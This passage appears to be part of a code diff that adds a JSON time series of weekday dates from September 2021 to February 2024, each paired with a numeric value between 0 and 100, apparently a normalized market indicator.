16.96775785300457 + ], + [ + "2021-09-15", + 13.52346933409542 + ], + [ + "2021-09-16", + 5.716719209916317 + ], + [ + "2021-09-17", + 15.805363156520153 + ], + [ + "2021-09-20", + 33.30666518466819 + ], + [ + "2021-09-21", + 21.81996376384881 + ], + [ + "2021-09-22", + 26.541072562420904 + ], + [ + "2021-09-23", + 30.967479488198652 + ], + [ + "2021-09-24", + 29.488220511942032 + ], + [ + "2021-09-27", + 27.579417494561614 + ], + [ + "2021-09-28", + 50.37216690287134 + ], + [ + "2021-09-29", + 50.259065759095954 + ], + [ + "2021-09-30", + 49.4130201537232 + ], + [ + "2021-10-01", + 52.34207634215711 + ], + [ + "2021-10-04", + 62.11982977220924 + ], + [ + "2021-10-05", + 70.7689207779462 + ], + [ + "2021-10-06", + 73.89907194480043 + ], + [ + "2021-10-07", + 78.22777192828198 + ], + [ + "2021-10-08", + 77.56804443722808 + ], + [ + "2021-10-11", + 78.3919790820862 + ], + [ + "2021-10-12", + 78.41838723658334 + ], + [ + "2021-10-13", + 78.69324963037162 + ], + [ + "2021-10-14", + 91.42939871307092 + ], + [ + "2021-10-15", + 89.49232725888677 + ], + [ + "2021-10-18", + 79.02586895477437 + ], + [ + "2021-10-19", + 80.25615285542989 + ], + [ + "2021-10-20", + 77.91773475425045 + ], + [ + "2021-10-21", + 76.41404827980291 + ], + [ + "2021-10-22", + 78.9457389333772 + ], + [ + "2021-10-25", + 79.42476299464909 + ], + [ + "2021-10-26", + 47.82674586973051 + ], + [ + "2021-10-27", + 46.84575591538647 + ], + [ + "2021-10-28", + 47.342668208679626 + ], + [ + "2021-10-29", + 47.156710996014375 + ], + [ + "2021-11-01", + 19.3314686032918 + ], + [ + "2021-11-02", + 15.57726504524698 + ], + [ + "2021-11-03", + 17.411954737413108 + ], + [ + "2021-11-04", + 19.656369716436068 + ], + [ + "2021-11-05", + 15.044397997023772 + ], + [ + "2021-11-08", + 8.49677651222673 + ], + [ + "2021-11-09", + 12.644716637072225 + ], + [ + "2021-11-10", + 30.90007367541256 + ], + [ + "2021-11-11", + 20.023204235700884 + ], + [ + "2021-11-12", + 22.34515142638907 + ], + [ + "2021-11-15", + 20.459518902848252 + ], + [ + "2021-11-16", + 20.270285506393947 + ], + [ + "2021-11-17", + 19.781557728314112 + ], + [ + "2021-11-18", + 21.992537156879102 + ], + [ + "2021-11-19", + 14.637253716081608 + ], + [ + "2021-11-22", + 23.941130270471493 + ], + [ + "2021-11-23", + 26.451842915858535 + ], + [ + "2021-11-24", + 26.471912831880672 + ], + [ + "2021-11-26", + 41.01680543310346 + ], + [ + "2021-11-29", + 55.691880342488055 + ], + [ + "2021-11-30", + 64.58671141569263 + ], + [ + "2021-12-01", + 74.52513311694781 + ], + [ + "2021-12-02", + 71.97479622069484 + ], + [ + "2021-12-03", + 73.93930738797934 + ], + [ + "2021-12-06", + 76.67422808227123 + ], + [ + "2021-12-07", + 100.0 + ], + [ + "2021-12-08", + 99.1419237412602 + ], + [ + "2021-12-09", + 98.96972313294776 + ], + [ + "2021-12-10", + 100.0 + ], + [ + "2021-12-13", + 100.0 + ], + [ + "2021-12-14", + 100.0 + ], + [ + "2021-12-15", + 100.0 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.79064444276227 + ], + [ + "2021-12-20", + 97.63428903492166 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 100.0 + ], + [ + "2021-12-27", + 97.97795788732172 + ], + [ + "2021-12-28", + 92.47968178625965 + ], + [ + "2021-12-29", + 88.96180572991312 + ], + [ + "2021-12-30", + 83.75717298193194 + ], + [ + "2021-12-31", + 84.34341669900378 + ], + [ + "2022-01-03", + 79.61633668539857 + ], + [ + "2022-01-04", + 82.77085680959645 + ], + [ + "2022-01-05", + 83.22750729177413 + ], + [ + "2022-01-06", + 82.56804402758237 + ], + [ + "2022-01-07", + 81.30490803269637 + ], + [ + "2022-01-10", + 78.94210510137101 + ], + [ + "2022-01-11", + 80.50313238424096 + ], + [ + "2022-01-12", + 79.24873536725532 + ], + [ + "2022-01-13", + 79.08426348670818 + ], + [ + "2022-01-14", + 69.80307220001721 + ], + [ + "2022-01-18", + 78.68901615742969 + ], + [ + "2022-01-19", + 79.1872704242228 + ], + [ + "2022-01-20", + 70.0065299613694 + ], + [ + "2022-01-21", + 75.0117234143464 + ], + [ + "2022-01-24", + 73.69618976151136 + ], + [ + "2022-01-25", + 70.15001783764347 + ], + [ + "2022-01-26", + 70.80000262740342 + ], + [ + "2022-01-27", + 69.90703075738485 + ], + [ + "2022-01-28", + 94.0576839886989 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 99.04213259417483 + ], + [ + "2022-02-02", + 99.8005592230089 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 100.0 + ], + [ + "2022-02-07", + 99.6011261201595 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 99.49619057512999 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 99.19494013335371 + ], + [ + "2022-02-17", + 100.0 + ], + [ + "2022-02-18", + 95.32385770171618 + ], + [ + "2022-02-22", + 95.57591845026018 + ], + [ + "2022-02-23", + 95.90908731297306 + ], + [ + "2022-02-24", + 100.0 + ], + [ + "2022-02-25", + 100.0 + ], + [ + "2022-02-28", + 93.27378937298624 + ], + [ + "2022-03-01", + 85.97646934788563 + ], + [ + "2022-03-02", + 88.0064458106716 + ], + [ + "2022-03-03", + 88.01670031155605 + ], + [ + "2022-03-04", + 78.04374258826321 + ], + [ + "2022-03-07", + 85.39905443168637 + ], + [ + "2022-03-08", + 85.33144684095134 + ], + [ + "2022-03-09", + 95.31521959115624 + ], + [ + "2022-03-10", + 91.15317083572461 + ], + [ + "2022-03-11", + 90.79891977065753 + ], + [ + "2022-03-14", + 87.04023477132995 + ], + [ + "2022-03-15", + 95.63076730006048 + ], + [ + "2022-03-16", + 100.0 + ], + [ + "2022-03-17", + 100.0 + ], + [ + "2022-03-18", + 97.20037934334545 + ], + [ + "2022-03-21", + 96.22683613609466 + ], + [ + "2022-03-22", + 97.23420341591516 + ], + [ + "2022-03-23", + 93.63973685798712 + ], + [ + "2022-03-24", + 89.93864833738348 + ], + [ + "2022-03-25", + 88.75251627862967 + ], + [ + "2022-03-28", + 89.90201062126603 + ], + [ + "2022-03-29", + 88.64266863742559 + ], + [ + "2022-03-30", + 88.9294827648327 + ], + [ + "2022-03-31", + 88.89603337839027 + ], + [ + "2022-04-01", + 86.80128074080268 + ], + [ + "2022-04-04", + 74.83680987746109 + ], + [ + "2022-04-05", + 80.23935732538213 + ], + [ + "2022-04-06", + 77.92110851029891 + ], + [ + "2022-04-07", + 76.38685626269638 + ], + [ + "2022-04-08", + 74.00316729982951 + ], + [ + "2022-04-11", + 75.71138030265911 + ], + [ + "2022-04-12", + 69.57575574151656 + ], + [ + "2022-04-13", + 61.08229573737688 + ], + [ + "2022-04-14", + 64.67188959511856 + ], + [ + "2022-04-18", + 60.31598349646144 + ], + [ + "2022-04-19", + 64.94132349729742 + ], + [ + "2022-04-20", + 62.63664073327775 + ], + [ + "2022-04-21", + 64.08679644383263 + ], + [ + "2022-04-22", + 63.01497583132818 + ], + [ + "2022-04-25", + 65.4523011069806 + ], + [ + "2022-04-26", + 70.60190939248248 + ], + [ + "2022-04-27", + 65.73031229688478 + ], + [ + "2022-04-28", + 80.1651077424068 + ], + [ + "2022-04-29", + 90.21560837737373 + ], + [ + "2022-05-02", + 93.51458434209412 + ], + [ + "2022-05-03", + 88.56543997914243 + ], + [ + "2022-05-04", + 97.21863461245293 + ], + [ + "2022-05-05", + 100.0 + ], + [ + "2022-05-06", + 99.77599074145581 + ], + [ + "2022-05-09", + 100.0 + ], + [ + "2022-05-10", + 100.0 + ], + [ + "2022-05-11", + 100.0 + ], + [ + "2022-05-12", + 96.24076942728459 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.89002660366674 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 99.39482670066101 + ], + [ + "2022-05-20", + 97.808636397352 + ], + [ + "2022-05-23", + 98.47073339758263 + ], + [ + "2022-05-24", + 95.19951728891908 + ], + [ + "2022-05-25", + 96.45536605862276 + ], + [ + "2022-05-26", + 94.28928660453411 + ], + [ + "2022-05-27", + 92.23884622626628 + ], + [ + "2022-05-31", + 91.068277335902 + ], + [ + "2022-06-01", + 91.20632536467139 + ], + [ + "2022-06-02", + 89.55498388403774 + ], + [ + "2022-06-03", + 81.9111915543498 + ], + [ + "2022-06-06", + 81.44381698480134 + ], + [ + "2022-06-07", + 73.76035468767152 + ], + [ + "2022-06-08", + 73.65327586341415 + ], + [ + "2022-06-09", + 72.89488333799875 + ], + [ + "2022-06-10", + 79.28589446778327 + ], + [ + "2022-06-13", + 81.37913669104366 + ], + [ + "2022-06-14", + 81.37320713743333 + ], + [ + "2022-06-15", + 81.06587309655134 + ], + [ + "2022-06-16", + 77.95399606731714 + ], + [ + "2022-06-17", + 79.00193640595046 + ], + [ + "2022-06-21", + 82.39437310989017 + ], + [ + "2022-06-22", + 80.89544855533933 + ], + [ + "2022-06-23", + 80.15638339611935 + ], + [ + "2022-06-24", + 84.87999322558065 + ], + [ + "2022-06-27", + 81.6007248968529 + ], + [ + "2022-06-28", + 79.47459173516826 + ], + [ + "2022-06-29", + 79.56459769039455 + ], + [ + "2022-06-30", + 79.78715521271724 + ], + [ + "2022-07-01", + 75.41020419052076 + ], + [ + "2022-07-05", + 75.18751648400507 + ], + [ + "2022-07-06", + 75.36759212919254 + ], + [ + "2022-07-07", + 77.45514377398493 + ], + [ + "2022-07-08", + 77.40622659512516 + ], + [ + "2022-07-11", + 76.10771685371039 + ], + [ + "2022-07-12", + 70.39917766852949 + ], + [ + "2022-07-13", + 58.084455409141476 + ], + [ + "2022-07-14", + 58.096552408661104 + ], + [ + "2022-07-15", + 56.62984660582331 + ], + [ + "2022-07-18", + 44.99957257111048 + ], + [ + "2022-07-19", + 48.96321372992462 + ], + [ + "2022-07-20", + 47.015135638590635 + ], + [ + "2022-07-21", + 47.50229956460812 + ], + [ + "2022-07-22", + 49.80639406488248 + ], + [ + "2022-07-25", + 42.545488403021025 + ], + [ + "2022-07-26", + 45.17279372189584 + ], + [ + "2022-07-27", + 48.61064326135146 + ], + [ + "2022-07-28", + 48.720795629510796 + ], + [ + "2022-07-29", + 47.94422183213287 + ], + [ + "2022-08-01", + 48.212440578122724 + ], + [ + "2022-08-02", + 47.671316437541144 + ], + [ + "2022-08-03", + 50.78774118617029 + ], + [ + "2022-08-04", + 49.20231883612656 + ], + [ + "2022-08-05", + 50.18980831428163 + ], + [ + "2022-08-08", + 46.000051910126025 + ], + [ + "2022-08-09", + 46.38780723189021 + ], + [ + "2022-08-10", + 49.11735480235697 + ], + [ + "2022-08-11", + 49.93616772408602 + ], + [ + "2022-08-12", + 50.13844435973544 + ], + [ + "2022-08-15", + 48.76173521487571 + ], + [ + "2022-08-16", + 45.471046652954 + ], + [ + "2022-08-17", + 46.21888971160952 + ], + [ + "2022-08-18", + 45.47399723980744 + ], + [ + "2022-08-19", + 46.12261387944843 + ], + [ + "2022-08-22", + 50.81419911348984 + ], + [ + "2022-08-23", + 47.34194626165566 + ], + [ + "2022-08-24", + 35.69542597750847 + ], + [ + "2022-08-25", + 37.25939528266207 + ], + [ + "2022-08-26", + 47.240333166692864 + ], + [ + "2022-08-29", + 47.7676987698569 + ], + [ + "2022-08-30", + 48.34362969540075 + ], + [ + "2022-08-31", + 42.150309351181484 + ], + [ + "2022-09-01", + 41.724951073278355 + ], + [ + "2022-09-02", + 42.32991287613378 + ], + [ + "2022-09-06", + 42.400845023881025 + ], + [ + "2022-09-07", + 45.93997212447758 + ], + [ + "2022-09-08", + 39.47292264330388 + ], + [ + "2022-09-09", + 43.97283999294785 + ], + [ + "2022-09-12", + 42.17105731705719 + ], + [ + "2022-09-13", + 58.00044184013326 + ], + [ + "2022-09-14", + 59.001468336321224 + ], + [ + "2022-09-15", + 59.5210927454181 + ], + [ + "2022-09-16", + 58.73383123085616 + ], + [ + "2022-09-19", + 58.71906652832122 + ], + [ + "2022-09-20", + 55.9129585098751 + ], + [ + "2022-09-21", + 57.013291803200595 + ], + [ + "2022-09-22", + 56.92713848053077 + ], + [ + "2022-09-23", + 53.83156818273436 + ], + [ + "2022-09-26", + 46.04783539594185 + ], + [ + "2022-09-27", + 46.10255981754926 + ], + [ + "2022-09-28", + 49.690378778724195 + ], + [ + "2022-09-29", + 53.47488442362226 + ], + [ + "2022-09-30", + 54.270953745964846 + ], + [ + "2022-10-03", + 58.50960501803066 + ], + [ + "2022-10-04", + 64.99539196598597 + ], + [ + "2022-10-05", + 62.27422976214058 + ], + [ + "2022-10-06", + 62.018337217419585 + ], + [ + "2022-10-07", + 64.41542994848622 + ], + [ + "2022-10-10", + 62.38827464021783 + ], + [ + "2022-10-11", + 47.92149965314717 + ], + [ + "2022-10-12", + 46.89106806006473 + ], + [ + "2022-10-13", + 50.950468482314484 + ], + [ + "2022-10-14", + 55.14868101822671 + ], + [ + "2022-10-17", + 62.59308097884286 + ], + [ + "2022-10-18", + 63.26559843735563 + ], + [ + "2022-10-19", + 61.86153582300793 + ], + [ + "2022-10-20", + 61.324542787035284 + ], + [ + "2022-10-21", + 63.5278197564787 + ], + [ + "2022-10-24", + 64.0709336932686 + ], + [ + "2022-10-25", + 66.0468497369201 + ], + [ + "2022-10-26", + 66.977145673907 + ], + [ + "2022-10-27", + 64.44006918763043 + ], + [ + "2022-10-28", + 67.06652471952395 + ], + [ + "2022-10-31", + 65.49672161939672 + ], + [ + "2022-11-01", + 60.50332458883605 + ], + [ + "2022-11-02", + 66.49187481800274 + ], + [ + "2022-11-03", + 67.75621531508985 + ], + [ + "2022-11-04", + 62.2702831271192 + ], + [ + "2022-11-07", + 62.35613614551912 + ], + [ + "2022-11-08", + 60.937673597859046 + ], + [ + "2022-11-09", + 64.04044994137197 + ], + [ + "2022-11-10", + 87.943135162065 + ], + [ + "2022-11-11", + 83.6142650493614 + ], + [ + "2022-11-14", + 80.42820532038316 + ], + [ + "2022-11-15", + 80.8162017778405 + ], + [ + "2022-11-16", + 81.90557626124661 + ], + [ + "2022-11-17", + 81.69794969860546 + ], + [ + "2022-11-18", + 79.5301109042976 + ], + [ + "2022-11-21", + 79.02447862237435 + ], + [ + "2022-11-22", + 77.81711764874419 + ], + [ + "2022-11-23", + 75.38630312134416 + ], + [ + "2022-11-25", + 72.18412070996418 + ], + [ + "2022-11-28", + 67.23671614848448 + ], + [ + "2022-11-29", + 65.64164975931709 + ], + [ + "2022-11-30", + 75.27834554186248 + ], + [ + "2022-12-01", + 65.92156099313952 + ], + [ + "2022-12-02", + 62.17702014294756 + ], + [ + "2022-12-05", + 64.23709787222063 + ], + [ + "2022-12-06", + 63.794094676882054 + ], + [ + "2022-12-07", + 63.92196387861945 + ], + [ + "2022-12-08", + 59.384356356675006 + ], + [ + "2022-12-09", + 14.161408018309737 + ], + [ + "2022-12-12", + 11.73814484710957 + ], + [ + "2022-12-13", + 12.087106911596353 + ], + [ + "2022-12-14", + 10.729953374331322 + ], + [ + "2022-12-15", + 20.206656352051063 + ], + [ + "2022-12-16", + 20.885545922130817 + ], + [ + "2022-12-19", + 22.227687796848343 + ], + [ + "2022-12-20", + 21.625451116712018 + ], + [ + "2022-12-21", + 21.78373065903754 + ], + [ + "2022-12-22", + 24.44748243089053 + ], + [ + "2022-12-23", + 24.547672728089093 + ], + [ + "2022-12-27", + 24.445306734166714 + ], + [ + "2022-12-28", + 25.23231059323364 + ], + [ + "2022-12-29", + 7.589757618677165 + ], + [ + "2022-12-30", + 7.341265595660388 + ], + [ + "2023-01-03", + 7.410902438036926 + ], + [ + "2023-01-04", + 6.6842005984891175 + ], + [ + "2023-01-05", + 4.761604738827186 + ], + [ + "2023-01-06", + 14.472549431761808 + ], + [ + "2023-01-09", + 13.220358177102016 + ], + [ + "2023-01-10", + 14.314679240674735 + ], + [ + "2023-01-11", + 15.864028993310264 + ], + [ + "2023-01-12", + 14.77936327459336 + ], + [ + "2023-01-13", + 14.978436209185025 + ], + [ + "2023-01-17", + 2.2709845415891112 + ], + [ + "2023-01-18", + 2.950619207006778 + ], + [ + "2023-01-19", + 1.8588134118920698 + ], + [ + "2023-01-20", + 9.700385986221601 + ], + [ + "2023-01-23", + 12.367394701016666 + ], + [ + "2023-01-24", + 4.16946178257337 + ], + [ + "2023-01-25", + 4.541492840872706 + ], + [ + "2023-01-26", + 2.9770103930443015 + ], + [ + "2023-01-27", + 0.0 + ], + [ + "2023-01-30", + 3.9255315068065415 + ], + [ + "2023-01-31", + 4.965457771428992 + ], + [ + "2023-02-01", + 5.885960441868976 + ], + [ + "2023-02-02", + 14.413401783685268 + ], + [ + "2023-02-03", + 15.210406245578808 + ], + [ + "2023-02-06", + 13.812751602931412 + ], + [ + "2023-02-07", + 16.02114828710353 + ], + [ + "2023-02-08", + 22.012150657160728 + ], + [ + "2023-02-09", + 22.518654018574928 + ], + [ + "2023-02-10", + 23.66205757908848 + ], + [ + "2023-02-13", + 25.02758361411534 + ], + [ + "2023-02-14", + 25.06651777274362 + ], + [ + "2023-02-15", + 22.17751947039723 + ], + [ + "2023-02-16", + 25.601910666564308 + ], + [ + "2023-02-17", + 21.421098366025337 + ], + [ + "2023-02-21", + 23.96073510793928 + ], + [ + "2023-02-22", + 23.87942500237065 + ], + [ + "2023-02-23", + 24.24554589729282 + ], + [ + "2023-02-24", + 23.815784897847422 + ], + [ + "2023-02-27", + 23.402144428508556 + ], + [ + "2023-02-28", + 19.297385702357435 + ], + [ + "2023-03-01", + 17.618919154436703 + ], + [ + "2023-03-02", + 12.971536851152122 + ], + [ + "2023-03-03", + 3.323499452675313 + ], + [ + "2023-03-06", + 0.32757611694085775 + ], + [ + "2023-03-07", + 1.2705458675320025 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 1.1548934756532674 + ], + [ + "2023-03-13", + 1.9232442051725231 + ], + [ + "2023-03-14", + 5.4632170030381015 + ], + [ + "2023-03-15", + 5.033399243424841 + ], + [ + "2023-03-16", + 12.941199014919317 + ], + [ + "2023-03-17", + 9.101099555980754 + ], + [ + "2023-03-20", + 8.506967082065366 + ], + [ + "2023-03-21", + 2.6372608000445177 + ], + [ + "2023-03-22", + 5.739270751149009 + ], + [ + "2023-03-23", + 6.4302363857741005 + ], + [ + "2023-03-24", + 1.6917272401030883 + ], + [ + "2023-03-27", + 2.6382810108030403 + ], + [ + "2023-03-28", + 3.2237932408105276 + ], + [ + "2023-03-29", + 4.612795046194514 + ], + [ + "2023-03-30", + 4.733288738294071 + ], + [ + "2023-03-31", + 3.251215065601572 + ], + [ + "2023-04-03", + 3.6131398010802194 + ], + [ + "2023-04-04", + 0.9713091899080015 + ], + [ + "2023-04-05", + 3.453058680594 + ], + [ + "2023-04-06", + 0.0 + ], + [ + "2023-04-10", + 0.0 + ], + [ + "2023-04-11", + 1.4966885131912127 + ], + [ + "2023-04-12", + 0.0 + ], + [ + "2023-04-13", + 3.4444870679183692 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.014205739196340605 + ], + [ + "2023-04-19", + 0.0 + ], + [ + "2023-04-20", + 0.0 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.017108763205185454 + ], + [ + "2023-04-25", + 4.557678051905795 + ], + [ + "2023-04-26", + 4.4541407844732275 + ], + [ + "2023-04-27", + 9.380878372762158 + ], + [ + "2023-04-28", + 8.989632272313958 + ], + [ + "2023-05-01", + 5.790007961916787 + ], + [ + "2023-05-02", + 6.742177673390037 + ], + [ + "2023-05-03", + 7.132083006634048 + ], + [ + "2023-05-04", + 5.858003708203887 + ], + [ + "2023-05-05", + 10.498162048356146 + ], + [ + "2023-05-08", + 10.521194041026265 + ], + [ + "2023-05-09", + 10.519683541573583 + ], + [ + "2023-05-10", + 10.36398450566556 + ], + [ + "2023-05-11", + 6.395624936215248 + ], + [ + "2023-05-12", + 6.539539536609111 + ], + [ + "2023-05-15", + 6.753582232938543 + ], + [ + "2023-05-16", + 6.7428650267299055 + ], + [ + "2023-05-17", + 8.089428728641412 + ], + [ + "2023-05-18", + 9.774004722995778 + ], + [ + "2023-05-19", + 10.122475298375994 + ], + [ + "2023-05-22", + 9.912710672395422 + ], + [ + "2023-05-23", + 6.952811107209846 + ], + [ + "2023-05-24", + 8.061444381338255 + ], + [ + "2023-05-25", + 6.302482680902263 + ], + [ + "2023-05-26", + 12.759672057168864 + ], + [ + "2023-05-30", + 12.79639082758744 + ], + [ + "2023-05-31", + 12.29706869369648 + ], + [ + "2023-06-01", + 11.365110519896035 + ], + [ + "2023-06-02", + 10.521143693789265 + ], + [ + "2023-06-05", + 7.50310779219354 + ], + [ + "2023-06-06", + 7.8190520046657594 + ], + [ + "2023-06-07", + 12.697373745629017 + ], + [ + "2023-06-08", + 12.831735619226182 + ], + [ + "2023-06-09", + 12.809890630401558 + ], + [ + "2023-06-12", + 14.057498154892919 + ], + [ + "2023-06-13", + 14.12972685280242 + ], + [ + "2023-06-14", + 13.94345300188948 + ], + [ + "2023-06-15", + 13.898601241128954 + ], + [ + "2023-06-16", + 13.313540896267323 + ], + [ + "2023-06-20", + 13.199496919608219 + ], + [ + "2023-06-21", + 17.18314536665565 + ], + [ + "2023-06-22", + 14.00932573776954 + ], + [ + "2023-06-23", + 15.482720478671737 + ], + [ + "2023-06-26", + 13.522607426145738 + ], + [ + "2023-06-27", + 8.916124043630973 + ], + [ + "2023-06-28", + 8.815965719979008 + ], + [ + "2023-06-29", + 7.925660426344357 + ], + [ + "2023-06-30", + 8.91863689358045 + ], + [ + "2023-07-03", + 8.50872505023996 + ], + [ + "2023-07-05", + 8.561991048643398 + ], + [ + "2023-07-06", + 9.879321916262683 + ], + [ + "2023-07-07", + 4.819223721732155 + ], + [ + "2023-07-10", + 3.470557214747985 + ], + [ + "2023-07-11", + 3.529924200212757 + ], + [ + "2023-07-12", + 1.527195709804582 + ], + [ + "2023-07-13", + 4.582799111166193 + ], + [ + "2023-07-14", + 4.222195684326662 + ], + [ + "2023-07-17", + 3.521614475327496 + ], + [ + "2023-07-18", + 2.9744102576383247 + ], + [ + "2023-07-19", + 2.804748069993705 + ], + [ + "2023-07-20", + 9.203006137920177 + ], + [ + "2023-07-21", + 8.146820164352272 + ], + [ + "2023-07-24", + 6.18604159905343 + ], + [ + "2023-07-25", + 2.7033043822953142 + ], + [ + "2023-07-26", + 0.0 + ], + [ + "2023-07-27", + 0.3426287166488981 + ], + [ + "2023-07-28", + 4.314961919582368 + ], + [ + "2023-07-31", + 1.6164269644122893 + ], + [ + "2023-08-01", + 1.912901298682105 + ], + [ + "2023-08-02", + 9.99632573580521 + ], + [ + "2023-08-03", + 9.081340229804448 + ], + [ + "2023-08-04", + 9.254384764446598 + ], + [ + "2023-08-07", + 10.047325595292172 + ], + [ + "2023-08-08", + 11.058717604024066 + ], + [ + "2023-08-09", + 10.524473668909785 + ], + [ + "2023-08-10", + 5.912330716377298 + ], + [ + "2023-08-11", + 6.273766431206841 + ], + [ + "2023-08-14", + 6.9542039056072795 + ], + [ + "2023-08-15", + 6.361692180817739 + ], + [ + "2023-08-16", + 7.248414094567404 + ], + [ + "2023-08-17", + 1.649077314778734 + ], + [ + "2023-08-18", + 1.6639893889339945 + ], + [ + "2023-08-21", + 6.836730341000781 + ], + [ + "2023-08-22", + 5.671719054787525 + ], + [ + "2023-08-23", + 10.202544063172065 + ], + [ + "2023-08-24", + 15.864444716286819 + ], + [ + "2023-08-25", + 11.579239199312166 + ], + [ + "2023-08-28", + 12.835497632919738 + ], + [ + "2023-08-29", + 19.820154201715397 + ], + [ + "2023-08-30", + 14.37421216792987 + ], + [ + "2023-08-31", + 14.37199446785858 + ], + [ + "2023-09-01", + 14.046422727674532 + ], + [ + "2023-09-05", + 13.21036386151125 + ], + [ + "2023-09-06", + 13.27612026155493 + ], + [ + "2023-09-07", + 12.252828021191132 + ], + [ + "2023-09-08", + 12.240904856650308 + ], + [ + "2023-09-11", + 12.978319383513876 + ], + [ + "2023-09-12", + 13.321732647083792 + ], + [ + "2023-09-13", + 11.792319759880806 + ], + [ + "2023-09-14", + 10.16277909972892 + ], + [ + "2023-09-15", + 12.798717393346381 + ], + [ + "2023-09-18", + 12.668970433317602 + ], + [ + "2023-09-19", + 9.650843226291249 + ], + [ + "2023-09-20", + 12.76817562006644 + ], + [ + "2023-09-21", + 13.630020450061393 + ], + [ + "2023-09-22", + 7.345887231416608 + ], + [ + "2023-09-25", + 6.625062133816989 + ], + [ + "2023-09-26", + 8.305702051974343 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 0.8260819851748046 + ], + [ + "2023-09-29", + 0.470386558082749 + ], + [ + "2023-10-02", + 2.301164923603018 + ], + [ + "2023-10-03", + 5.682920797435935 + ], + [ + "2023-10-04", + 9.084167805163172 + ], + [ + "2023-10-05", + 8.706101622472216 + ], + [ + "2023-10-06", + 13.409295667324484 + ], + [ + "2023-10-09", + 11.711565860116657 + ], + [ + "2023-10-10", + 10.987823206379087 + ], + [ + "2023-10-11", + 11.610274981367166 + ], + [ + "2023-10-12", + 10.708133121588425 + ], + [ + "2023-10-13", + 8.871554693757295 + ], + [ + "2023-10-16", + 10.869785710816728 + ], + [ + "2023-10-17", + 10.947622893708637 + ], + [ + "2023-10-18", + 10.805703400965568 + ], + [ + "2023-10-19", + 6.637974010727656 + ], + [ + "2023-10-20", + 9.937672552882118 + ], + [ + "2023-10-23", + 9.754473134015967 + ], + [ + "2023-10-24", + 7.814192872354235 + ], + [ + "2023-10-25", + 16.10186861398677 + ], + [ + "2023-10-26", + 19.116226084206296 + ], + [ + "2023-10-27", + 19.600268027315348 + ], + [ + "2023-10-30", + 20.387334648692082 + ], + [ + "2023-10-31", + 17.43588313156939 + ], + [ + "2023-11-01", + 18.939479984323143 + ], + [ + "2023-11-02", + 22.63951769774939 + ], + [ + "2023-11-03", + 20.94426848537625 + ], + [ + "2023-11-06", + 20.834232504534636 + ], + [ + "2023-11-07", + 21.516799637166002 + ], + [ + "2023-11-08", + 20.950002377610378 + ], + [ + "2023-11-09", + 21.53813486329409 + ], + [ + "2023-11-10", + 24.88297973779606 + ], + [ + "2023-11-13", + 25.352516360462936 + ], + [ + "2023-11-14", + 30.367110284086984 + ], + [ + "2023-11-15", + 26.954910156517798 + ], + [ + "2023-11-16", + 25.175025234438902 + ], + [ + "2023-11-17", + 20.67826055383203 + ], + [ + "2023-11-20", + 21.970448838195882 + ], + [ + "2023-11-21", + 23.062818509192425 + ], + [ + "2023-11-22", + 10.488454051085858 + ], + [ + "2023-11-24", + 0.22754429825816025 + ], + [ + "2023-11-27", + 1.1343628590584725 + ], + [ + "2023-11-28", + 0.8083770882307091 + ], + [ + "2023-11-29", + 1.609406550072966 + ], + [ + "2023-11-30", + 0.0 + ], + [ + "2023-12-01", + 0.0 + ], + [ + "2023-12-04", + 1.5914565407285066 + ], + [ + "2023-12-05", + 1.543459644033259 + ], + [ + "2023-12-06", + 1.6477010794238331 + ], + [ + "2023-12-07", + 4.641132847571875 + ], + [ + "2023-12-08", + 2.602980185958788 + ], + [ + "2023-12-11", + 0.0 + ], + [ + "2023-12-12", + 0.12662404137454605 + ], + [ + "2023-12-13", + 0.0 + ], + [ + "2023-12-14", + 0.2232187669626627 + ], + [ + "2023-12-15", + 0.24237453738194256 + ], + [ + "2023-12-18", + 0.846198343846535 + ], + [ + "2023-12-19", + 0.0 + ], + [ + "2023-12-20", + 8.066712226174731 + ], + [ + "2023-12-21", + 10.716432138691635 + ], + [ + "2023-12-22", + 10.237628610616525 + ], + [ + "2023-12-26", + 10.25940297102608 + ], + [ + "2023-12-27", + 10.286844880262102 + ], + [ + "2023-12-28", + 10.198643688981473 + ], + [ + "2023-12-29", + 11.078322281932863 + ], + [ + "2024-01-02", + 22.126406963146913 + ], + [ + "2024-01-03", + 22.900434080605415 + ], + [ + "2024-01-04", + 24.203320511157912 + ], + [ + "2024-01-05", + 22.736460310663396 + ], + [ + "2024-01-08", + 27.899547433802933 + ], + [ + "2024-01-09", + 27.771101227454576 + ], + [ + "2024-01-10", + 27.179054928384478 + ], + [ + "2024-01-11", + 26.00345492257434 + ], + [ + "2024-01-12", + 22.80884685104049 + ], + [ + "2024-01-16", + 22.78722974144775 + ], + [ + "2024-01-17", + 23.54618258233557 + ], + [ + "2024-01-18", + 27.625352646912116 + ], + [ + "2024-01-19", + 35.71449247263886 + ], + [ + "2024-01-22", + 28.822688211063163 + ], + [ + "2024-01-23", + 26.72829498775967 + ], + [ + "2024-01-24", + 27.066636842427794 + ], + [ + "2024-01-25", + 26.607191574353884 + ], + [ + "2024-01-26", + 28.176440340700566 + ], + [ + "2024-01-29", + 29.78173471297978 + ], + [ + "2024-01-30", + 30.572030760183168 + ], + [ + "2024-01-31", + 33.30849242688958 + ], + [ + "2024-02-01", + 31.463659372854778 + ], + [ + "2024-02-02", + 34.01747907267993 + ], + [ + "2024-02-05", + 34.59676015737571 + ], + [ + "2024-02-06", + 27.970201937092025 + ], + [ + "2024-02-07", + 29.298966277869816 + ], + [ + "2024-02-08", + 28.998161396846434 + ], + [ + "2024-02-09", + 30.167242184378313 + ], + [ + "2024-02-12", + 